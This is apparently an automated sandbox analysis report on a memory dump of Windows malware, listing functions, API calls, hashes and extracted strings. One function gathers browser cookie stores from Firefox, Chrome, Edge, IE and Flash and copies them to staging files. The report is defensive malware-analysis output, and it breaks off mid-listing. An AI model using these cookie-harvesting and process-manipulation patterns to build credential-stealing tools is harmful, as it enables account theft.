Instruction ID: 8d3154784be3890a494dda0e087e8053d43c7067ec457ed049251b1eb8944374
Opcode Fuzzy Hash: 876a1844408ab627f93bba079d5955f375b694bcaa502b9eeaf279b2b8832491
Instruction Fuzzy Hash: 09118E71600109AFD718DF19EC05FEE3BA9F792B10F284266E51987272E7706A05DB64

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2A2E, Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000,00000000), ref: 00CA2A5E
GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000003,00000000), ref: 00CA2AA5

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
String ID:
API String ID: 552344955-0
Opcode ID: 3800187e4609ce9ff727c7e7f0d27262b1979e8d3483fd41e269d54450616fc3
Instruction ID: d4b84922133a243a50b1968c1c12192e1a819db75bbb6292831493d1c5c5feb2
Opcode Fuzzy Hash: 3800187e4609ce9ff727c7e7f0d27262b1979e8d3483fd41e269d54450616fc3
Instruction Fuzzy Hash: 6F11A57190021AEFCB21DFADD844B9EBBB8EF96798F204059E42497210DB748F45EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CACF2A, Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,?,?,63699BC3,00000000,00CA7CE2,?), ref: 00CACF67
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00CA7CE2,?,?), ref: 00CACFC8

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Time$FileFreeHeapSystem
String ID:
API String ID: 892271797-0
Opcode ID: 48176dfdc80347f25f21de67af20d5d92e193a913fbe0d02001f5446b49a2bb8
Instruction ID: 1e8effa288964c03cc5c18df2337db12d57cc324307babac4bf81a18a35de7f9
Opcode Fuzzy Hash: 48176dfdc80347f25f21de67af20d5d92e193a913fbe0d02001f5446b49a2bb8
Instruction Fuzzy Hash: EC11DA75900119EFCF00EBE4ED89BDEB7BDEB04705F100192A902E2151DB749B45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CA64FD, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

HeapFree.KERNEL32(00000000,00000000,00000000,1795F247,Kill,00000000,?,?,?,00000000,00CA7E8C,00CA046A,00000000,00000000), ref: 00CA6568

Part of subcall function 00C980B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00C96281,00000000), ref: 00C980C8
Part of subcall function 00C980B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00C96281,00000000), ref: 00C980D7

Part of subcall function 00C9A7B1: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,747DF5B0,00CA7D3D,61636F4C,00000001,?,?), ref: 00C9A7D7
Part of subcall function 00C9A7B1: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00C9A7E3
Part of subcall function 00C9A7B1: GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 00C9A7FA
Part of subcall function 00C9A7B1: GetProcAddress.KERNEL32(00000000), ref: 00C9A801
Part of subcall function 00C9A7B1: Thread32First.KERNEL32(?,0000001C), ref: 00C9A811
Part of subcall function 00C9A7B1: CloseHandle.KERNEL32(?), ref: 00C9A859

Strings

Kill, xrefs: 00CA650A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseHandle$HeapQueryValue$AddressAllocateCreateFirstFreeModuleProcSnapshotThread32Toolhelp32
String ID: Kill
API String ID: 2627809124-2803628375
Opcode ID: f05fcc0dbdb97f65a8941f3bac3895a7a8b489646cd744a1631fe5a413459ba2
Instruction ID: 6e7d3e531bd4ccd6490348985601cfac49a7ed99374ff5ef6f7a38943e0a228c
Opcode Fuzzy Hash: f05fcc0dbdb97f65a8941f3bac3895a7a8b489646cd744a1631fe5a413459ba2
Instruction Fuzzy Hash: 34018675510108BB9F11EBE4DD85EDFBBFDEB01748B040165F411A2111EA719F04D661

Uniqueness

Uniqueness Score: -1.00%

Function 00CACE39, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

HeapFree.KERNEL32(00000000,00000000,00000000,Scr,00000000,?,?,?,00000000,00CA7E87,00CA046A,00000000,00000000), ref: 00CACEAB

Part of subcall function 00C980B6: StrChrA.SHLWAPI(?,0000002E,?,?,?,00000000,00C96281,00000000), ref: 00C980C8
Part of subcall function 00C980B6: StrChrA.SHLWAPI(?,00000020,?,?,00000000,00C96281,00000000), ref: 00C980D7

Part of subcall function 00C994B4: lstrlen.KERNEL32(?,00000000,00000000,74785520,?,?,?,00C91647,0000010D,00000000,00000000), ref: 00C994E4
Part of subcall function 00C994B4: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 00C994FA
Part of subcall function 00C994B4: memcpy.NTDLL(00000010,?,00000000,?,?,?,00C91647,0000010D), ref: 00C99530
Part of subcall function 00C994B4: memcpy.NTDLL(00000010,00000000,00C91647,?,?,?,00C91647), ref: 00C9954B
Part of subcall function 00C994B4: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000119,00000001), ref: 00C99569
Part of subcall function 00C994B4: GetLastError.KERNEL32(?,?,?,00C91647), ref: 00C99573
Part of subcall function 00C994B4: HeapFree.KERNEL32(00000000,00000000,?,?,?,00C91647), ref: 00C99599

Strings

Scr, xrefs: 00CACE46

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateFreeQueryValuememcpy$CallCloseErrorLastNamedPipelstrlen
String ID: Scr
API String ID: 730886825-1633706383
Opcode ID: cf3c4e25467fec53e1d6acc1b3e7bdfcd5b9bd0e295e5716c60c54a34b746ae3
Instruction ID: aca4f8859a9b16ae8456292a7b2ddb7fd171b00119150778f521e94ab49b0e6a
Opcode Fuzzy Hash: cf3c4e25467fec53e1d6acc1b3e7bdfcd5b9bd0e295e5716c60c54a34b746ae3
Instruction Fuzzy Hash: 12018631510208BADF11E7A5DD4AFDF7FADEB06758F004165F901A2190DAB0AE04E761

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1884, Relevance: 3.0, APIs: 2, Instructions: 27COMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00CBDF5C), ref: 00CA1899

Part of subcall function 00C9A027: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00C9A052
Part of subcall function 00C9A027: HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 00C9A05F
Part of subcall function 00C9A027: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 00C9A0EB
Part of subcall function 00C9A027: GetModuleHandleA.KERNEL32(00000000), ref: 00C9A0F6
Part of subcall function 00C9A027: RtlImageNtHeader.NTDLL(00000000), ref: 00C9A0FF
Part of subcall function 00C9A027: RtlExitUserThread.NTDLL(00000000), ref: 00C9A114

InterlockedDecrement.KERNEL32(00CBDF5C), ref: 00CA18BD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
String ID:
API String ID: 1011034841-0
Opcode ID: 098183d5993f9a0ca3b73c138ca112796ce6f4dbbd461ad36e47996a84701a88
Instruction ID: 39328a757f3ea0fa1e783247b200e4af8cbf50e78d8e7104834e6b7e53e6217e
Opcode Fuzzy Hash: 098183d5993f9a0ca3b73c138ca112796ce6f4dbbd461ad36e47996a84701a88
Instruction Fuzzy Hash: 37E01A39208223679B217BA4BC09BAEAB95AB527CCF0A4624FD66D0091D728CD04D792

Uniqueness

Uniqueness Score: -1.00%

Function 00C94926, Relevance: 2.6, APIs: 2, Instructions: 70memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA9D35: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00CA9D6E
Part of subcall function 00CA9D35: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00CA9DA4
Part of subcall function 00CA9D35: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CA9DB0
Part of subcall function 00CA9D35: lstrcmpi.KERNEL32(?,00000000), ref: 00CA9DED
Part of subcall function 00CA9D35: StrChrA.SHLWAPI(?,0000002E), ref: 00CA9DF6
Part of subcall function 00CA9D35: lstrcmpi.KERNEL32(?,00000000), ref: 00CA9E08
Part of subcall function 00CA9D35: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CA9E59

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,00CBA5A8,0000002C,00CA9AAA,NTDLL.DLL,6547775A,?,00C91224), ref: 00C94965

Part of subcall function 00CAAC94: GetProcAddress.KERNEL32(6F57775A,00000000), ref: 00CAACBD
Part of subcall function 00CAAC94: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,00CA6D3E,00000000,00000000,00000028,00000100), ref: 00CAACDF

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,00CBA5A8,0000002C,00CA9AAA,NTDLL.DLL,6547775A,?,00C91224), ref: 00C949F0

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
String ID:
API String ID: 4138075514-0
Opcode ID: 7f4812113be2b0379ae5de6316c18064bef25253e68946588f0512cd95b2f92f
Instruction ID: 3ff8d4028bc331de6a9d5e3866d0c3c2829b5117bf89f2f21f4eb192ee663757
Opcode Fuzzy Hash: 7f4812113be2b0379ae5de6316c18064bef25253e68946588f0512cd95b2f92f
Instruction Fuzzy Hash: C621F575D01229ABCF11DFA5DC85ADEBBB8FF08720F11812AF914B6250C7344A45DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C9614C, Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(41564441,00000000,?,00000000,00C9B275,?,?,00000000,?,?,00000001,00000000,?,00000001,00CB83E4,00000002), ref: 00C96161

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 642f6b5563b98aca2c5163af97af8862c1841a16d5eeefc8a554d78561ea7dc8
Instruction ID: fa0fe05612ba065db7f0f06217175207d6fe7a03a14a93137bceacb157c01bee
Opcode Fuzzy Hash: 642f6b5563b98aca2c5163af97af8862c1841a16d5eeefc8a554d78561ea7dc8
Instruction Fuzzy Hash: 7F21C4B2A00119EFCF20EF98EC89ADDBBB9FB44314F144466E615A7282D731AE45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3B01, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00000000,00CBD514,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CA3B3C

Part of subcall function 00CACD7A: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,00CBE240), ref: 00CACD91

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HandleInformationModuleProcessQuery
String ID:
API String ID: 2776635927-0
Opcode ID: f3c8637d20ac036fa47d6e1dd357b1531fc0a2387fc680e68f68e3725acecceb
Instruction ID: 97dd49f603bb7658c113616f0a75f5c699cd49b809fb8f37be205d5b885ed477
Opcode Fuzzy Hash: f3c8637d20ac036fa47d6e1dd357b1531fc0a2387fc680e68f68e3725acecceb
Instruction Fuzzy Hash: A9218E71600646AFDB20CF99E8E4A6977AAEF463987244829F966CB150D730EF00DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CB2B84, Relevance: 1.6, APIs: 1, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00CB2BD6

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c453c741b52d7c578835e40dc8d53212de8247fc05641329d12d00b2b1a2117b
Instruction ID: 69cf701ac0359d10ec9b931eb8eb3c3cfdade0a179740f7348e22dc5cf504ded
Opcode Fuzzy Hash: c453c741b52d7c578835e40dc8d53212de8247fc05641329d12d00b2b1a2117b
Instruction Fuzzy Hash: 3511DE3260020AAFDF419F99DC40EDA7BAAEF49374F058125FD2996161CB71DD21DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00C9D9EB, Relevance: 1.5, APIs: 1, Instructions: 15threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA1F00: GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00CBE088,00000000,00C9D9F2,?,00C99809,?), ref: 00CA1F1F
Part of subcall function 00CA1F00: PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00CBE088,00000000,00C9D9F2,?,00C99809,?), ref: 00CA1F2A
Part of subcall function 00CA1F00: _wcsupr.NTDLL ref: 00CA1F37
Part of subcall function 00CA1F00: lstrlenW.KERNEL32(00000000), ref: 00CA1F3F

ResumeThread.KERNEL32(00000004,?,00C99809,?), ref: 00C9DA00

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileName$FindImagePathProcessResumeThread_wcsuprlstrlen
String ID:
API String ID: 3646851950-0
Opcode ID: 400e247d76e22e8f0fe1d684c4c55caac8a611de6e15ddb1584463ee43c34e2d
Instruction ID: 52c30629e8337fef876750a80116a0a833b7e06b6a8e7d431d2f4f3970dcb887
Opcode Fuzzy Hash: 400e247d76e22e8f0fe1d684c4c55caac8a611de6e15ddb1584463ee43c34e2d
Instruction Fuzzy Hash: D3D05E34208341EADF616B21CD09B0ABD957F21B95F108418F9C7700A6DB318920F608

Uniqueness

Uniqueness Score: -1.00%

Function 00CB658F, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CB659C

Part of subcall function 00CB66AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00C90000), ref: 00CB6725

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: 45764ec8b5b3c1af8d760cdf495b51ffae2f2088e8bd4015a1e822b084a9fd38
Instruction ID: 47993bc100dd89e50fd5cd261b210aecb169577f82954f42a703cfcca66a9093
Opcode Fuzzy Hash: 45764ec8b5b3c1af8d760cdf495b51ffae2f2088e8bd4015a1e822b084a9fd38
Instruction Fuzzy Hash: 3EA011E22A82023C30282A82AC02CBB022CC0C0B22B30802AB082800A0A88C3E082032

Uniqueness

Uniqueness Score: -1.00%

Function 00CB65AA, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00CB659C

Part of subcall function 00CB66AC: RaiseException.KERNEL32(C06D0057,00000000,00000001,00000000,?,0002A594,00C90000), ref: 00CB6725

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ExceptionHelper2@8LoadRaise___delay
String ID:
API String ID: 123106877-0
Opcode ID: f7fea7fdd6cbf772fc57eaa26d154bc6b9a4512dd1421b36dec04e394c9540cb
Instruction ID: d188acea8774e5edf8c34d11abce936c11eee0472a28e081045a8f6b730a1007
Opcode Fuzzy Hash: f7fea7fdd6cbf772fc57eaa26d154bc6b9a4512dd1421b36dec04e394c9540cb
Instruction Fuzzy Hash: 33A001E62A9552BC35286A92AD06CBB522CC4D8B62B70892AB482840A5A8993D596036

Uniqueness

Uniqueness Score: -1.00%

Function 00CB247D, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 03f28c7c54aa2a37d5b0728eda39f02dd1ad618060fff44e69446e4177eb2d03
Instruction ID: 0b035637df619df28fa9377062c87d08e1f907b5b891fd6020c8d20fe8eb3594
Opcode Fuzzy Hash: 03f28c7c54aa2a37d5b0728eda39f02dd1ad618060fff44e69446e4177eb2d03
Instruction Fuzzy Hash: C7B01235004100ABCE019B60FD04F0D7F31B760700F104210B206400B086310825EB04

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4FB0, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 6cd8b25f2b9a23580fd3e2c595529643785c2c1bacc482969e2ecf2bc46273b2
Instruction ID: 1d54f3ef1da3382b6a679b0ce8a86e10c52860eab3f2d9981e7c53bb00931873
Opcode Fuzzy Hash: 6cd8b25f2b9a23580fd3e2c595529643785c2c1bacc482969e2ecf2bc46273b2
Instruction Fuzzy Hash: DAB01231004100ABCA019B40ED04F0D7B21B750700F104510B206400F087311C24EB14

Uniqueness

Uniqueness Score: -1.00%

Function 00C996D1, Relevance: 1.3, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

memset.NTDLL ref: 00C996EF

Part of subcall function 00CAE3A4: memset.NTDLL ref: 00CAE3CA
Part of subcall function 00CAE3A4: memcpy.NTDLL ref: 00CAE3F2
Part of subcall function 00CAE3A4: GetLastError.KERNEL32(00000010,00000218,00CB6DDD,00000100,?,00000318,00000008), ref: 00CAE409
Part of subcall function 00CAE3A4: GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00CB6DDD,00000100), ref: 00CAE4EC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastmemset$AllocateHeapmemcpy
String ID:
API String ID: 4290293647-0
Opcode ID: c1114b846b3f2984c44ce6ad7906591cd6d1108f4a03841a40aa61477e8b2b77
Instruction ID: c7e698e201b61ae252adbc387251e4e07b0ec20fc1b32a448634ac72342629dd
Opcode Fuzzy Hash: c1114b846b3f2984c44ce6ad7906591cd6d1108f4a03841a40aa61477e8b2b77
Instruction Fuzzy Hash: 2C0149305113096BCB209F2DEC85F8B7BE8EF49754F008429FC4487211CB71D9009BB1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4F76, Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CA4F80

Part of subcall function 00CAE866: RegOpenKeyExA.KERNELBASE(00CA4F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,00CBE130,00CA4F98,00CA15E7,80000001,?,00CA15E7), ref: 00CAE89F
Part of subcall function 00CAE866: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,00CA15E7), ref: 00CAE8B3
Part of subcall function 00CAE866: RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,00CA15E7), ref: 00CAE8FC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction ID: 85a60cd3899b2aec9a358e5b8fb947ddc176952b60157726fff9cb4ed73cd9ae
Opcode Fuzzy Hash: e0687e6f58cfad2a21941a97c3c994ebabc033b97c44297dbb8b3ae019ffb63b
Instruction Fuzzy Hash: 27E0E23024010DBBDB206B59DC02F893B65AF11798F00C020BE08691A2D6729A64A694

Uniqueness

Uniqueness Score: -1.00%

Function 00C949D6, Relevance: 1.3, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,?,00CBA5A8,0000002C,00CA9AAA,NTDLL.DLL,6547775A,?,00C91224), ref: 00C949F0

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: f55e672254ffa08dc9ab2d2223494ddc3ac379c9576d8da8183ba5708cc13445
Instruction ID: 6aa181a48a13b38d1a3cce457cc2c7472c6ae0ab385ed2e537829c1c6f61c6e2
Opcode Fuzzy Hash: f55e672254ffa08dc9ab2d2223494ddc3ac379c9576d8da8183ba5708cc13445
Instruction Fuzzy Hash: 3AD0E231D002199BCB209B98D84AA9EFB74BB08750F608224E960631A0CA201E16CBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C95ECA, Relevance: 58.0, APIs: 16, Strings: 17, Instructions: 226memorystringfileCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(%APPDATA%,00CB6CE0,00000000,?,00000000,00C923FE), ref: 00C95EE2

Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00CA88D9
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00CA88E5
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA892D
Part of subcall function 00CA888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8948
Part of subcall function 00CA888D: lstrlenW.KERNEL32(0000002C), ref: 00CA8980
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?), ref: 00CA8988
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA89AB
Part of subcall function 00CA888D: wcscpy.NTDLL ref: 00CA89BD

Part of subcall function 00CA888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00CA89E3
Part of subcall function 00CA888D: RtlEnterCriticalSection.NTDLL(?), ref: 00CA8A18
Part of subcall function 00CA888D: RtlLeaveCriticalSection.NTDLL(?), ref: 00CA8A34
Part of subcall function 00CA888D: FindNextFileW.KERNEL32(?,00000000), ref: 00CA8A4D
Part of subcall function 00CA888D: WaitForSingleObject.KERNEL32(00000000), ref: 00CA8A5F
Part of subcall function 00CA888D: FindClose.KERNEL32(?), ref: 00CA8A74
Part of subcall function 00CA888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8A88
Part of subcall function 00CA888D: lstrlenW.KERNEL32(0000002C), ref: 00CA8AAA

RtlAllocateHeap.NTDLL(00000000,00000036,%APPDATA%\Mozilla\Firefox\Profiles), ref: 00C95F29
memcpy.NTDLL(00000000,%APPDATA%,00000000,?,00000000,00C923FE), ref: 00C95F3E
lstrcpyW.KERNEL32(00000000,\Macromedia\Flash Player\), ref: 00C95F4E

Part of subcall function 00CA888D: FindNextFileW.KERNEL32(?,00000000), ref: 00CA8B20
Part of subcall function 00CA888D: WaitForSingleObject.KERNEL32(00000000), ref: 00CA8B32
Part of subcall function 00CA888D: FindClose.KERNEL32(?), ref: 00CA8B4D

HeapFree.KERNEL32(00000000,00000000,00000000,*.sol,?,00000000,00000000,00000010,?,?,00000000,00C923FE), ref: 00C95F72
RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 00C95F8A
HeapFree.KERNEL32(00000000,00000000,?,00000000,00C923FE), ref: 00C95FD6
lstrlenW.KERNEL32(00000000,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00C95FF5
RtlAllocateHeap.NTDLL(00000000,?), ref: 00C96007
HeapFree.KERNEL32(00000000,00000000,00000000,cookies,?,00000000,00000000,00000014,?,00000000,00C923FE), ref: 00C9605E
HeapFree.KERNEL32(00000000,00000000,?,00000000,00C923FE), ref: 00C96070
CreateDirectoryW.KERNEL32(00000000,00000000,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00C96097
lstrlenW.KERNEL32(\cookie.ie,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00C960DD
DeleteFileW.KERNEL32(?,%userprofile%\AppData\Local\,?,00000000,00C923FE), ref: 00C96106
HeapFree.KERNEL32(00000000,?,?,00000000,00C923FE), ref: 00C96114
HeapFree.KERNEL32(00000000,?,?,00000000,00C923FE), ref: 00C96137

Strings

%userprofile%\AppData\Local\, xrefs: 00C95FDC
%APPDATA%, xrefs: 00C95ED5, 00C95F38
Google\Chrome\User Data\Default, xrefs: 00C9600F
\sols, xrefs: 00C960E5
cookies.sqlite-journal, xrefs: 00C95F10
cookies, xrefs: 00C96027, 00C96049
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 00C95EFA, 00C95EFF, 00C95F15
\Macromedia\Flash Player\, xrefs: 00C95F46
*.sol, xrefs: 00C95F5D
cookies.sqlite, xrefs: 00C95EF5
\cookie.cr, xrefs: 00C960C9
*.txt, xrefs: 00C95FAB
\cookie.ff, xrefs: 00C960D0, 00C960DC
Microsoft\Edge\User Data\Default, xrefs: 00C96032
\cookie.ie, xrefs: 00C960D7
*.cookie, xrefs: 00C95FC1
\cookie.ed, xrefs: 00C960C2

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$lstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymemcpywcscpy
String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$%userprofile%\AppData\Local\$*.cookie$*.sol$*.txt$Google\Chrome\User Data\Default$Microsoft\Edge\User Data\Default$\Macromedia\Flash Player\$\cookie.cr$\cookie.ed$\cookie.ff$\cookie.ie$\sols$cookies$cookies.sqlite$cookies.sqlite-journal
API String ID: 659829602-1887243743
Opcode ID: 16739d3236c94e7596a1df2956dd6120a2af13f27acb2c889e4dc75ebc322c30
Instruction ID: a18ae397e538616f1df8ee5a8fcb6d846b36c685d5bfb1056f5fbaa34a269f3b
Opcode Fuzzy Hash: 16739d3236c94e7596a1df2956dd6120a2af13f27acb2c889e4dc75ebc322c30
Instruction Fuzzy Hash: 5061B471544304BFCB21AFA59C88FAF7BECEB89B48F040639F506D2291EA619D09D761

Uniqueness

Uniqueness Score: -1.00%

Function 00C9E0BA, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 224memoryfiletimeCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,.dll), ref: 00C9E0E8
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 00C9E10B
memset.NTDLL ref: 00C9E126

